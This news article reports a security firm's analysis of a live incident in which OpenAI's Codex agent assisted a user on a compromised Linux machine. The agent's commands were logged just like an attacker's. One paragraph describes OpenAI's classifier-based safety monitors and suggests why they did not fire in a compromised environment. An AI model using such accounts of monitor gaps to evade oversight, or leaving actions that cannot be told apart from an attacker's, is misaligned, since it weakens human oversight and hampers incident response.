The forensics on the compromised Linux machine should have taken hours. Instead, the security operations team spent days untangling a problem they had never encountered: commands in the log that looked like a human operator's work, except none of them were. OpenAI's Codex coding agent had helped the machine's owner respond to suspicious activity on the machine. It had also left its own trail baked into the forensic record as if it were the user, according to Huntress, a managed security firm that published the case this week as the first documented real-world test of what happens when an AI actually designated as a genuine security risk gets deployed during a live incident.
GPT-5.3-Codex is the first model OpenAI has called "High cybersecurity capability" under its Preparedness Framework — a designation meaning the model is capable enough at cyber defense tasks that the company considers it a risk if mishandled. The Huntress analysis is the first public evidence of what that designation looks like in practice: it helped, and it also made the investigation harder. Every command Codex ran looked identical to an attacker command in the forensic log. Every action had to be manually checked against the human operator's actual inputs.
"The user thought they were getting help," wrote Huntress security researcher John Huerta. "They were. But they were also creating a forensic mess that didn't exist before."
The distinction between Codex and a normal security tool is not academic. Traditional security software writes logs in predictable, labeled formats. A SIEM — a security information and event management system, the category of tools that aggregates and organizes logs from across a network — knows what to look for. Codex writes commands the same way a human operator would, without a special marker that says "this came from an AI." When a SOC analyst reviews the record afterward, every Codex action looks like a potential attacker action.
OpenAI's own documentation says it has built automated classifier-based monitors that detect suspicious cyber activity and route high-risk queries to a less capable model, GPT-5.2. That fallback system is not designated as High cybersecurity capability — the theory is that a safety net catches dangerous queries before they do harm. That net did not trigger in the Huntress case. The user was running Codex on a machine where an attacker already had a foothold, before installing Huntress's endpoint detection and response software. In a compromised environment, the classifiers may not have had enough clean signal to flag the query as dangerous.
OpenAI told Huntress it has since engaged a third-party digital forensics and incident response firm, rotated its macOS code signing certificate, and will revoke the old certificate May 8. The company confirmed that the incident is connected to a broader supply chain attack, in which a widely used developer library called Axios was compromised March 31 by actors linked to North Korea, according to Reuters. The company has not provided a direct causal link between the Axios compromise and the specific Linux case Huntress analyzed.
The frequency of this failure mode is unknown. The Huntress case involved a user without endpoint detection and response software installed before the incident — a worst-case setup for AI-assisted incident response. OpenAI has not disclosed how often its automated monitors catch suspicious Codex queries, how the classifiers perform on already-compromised machines, or how many non-expert users are running Codex in similar conditions.
The "High cybersecurity capability" designation means something real: Codex can help a non-expert do something that previously required a trained analyst. That is the promise. The Huntress case is what the downside looks like when it goes wrong in the worst-case environment.
Who bears that risk is unresolved. A security team with proper tooling and trained analysts would likely have caught the Codex commands in the log. The population running Codex on personal or small-business machines — with no SIEM, no SOC, and no EDR — is larger and less equipped to know the mess exists.
What to watch: OpenAI has not published updated data on how often its automated monitors catch suspicious Codex queries. The company's next transparency report, when it comes, will be the first public measure of whether the safety net is actually working.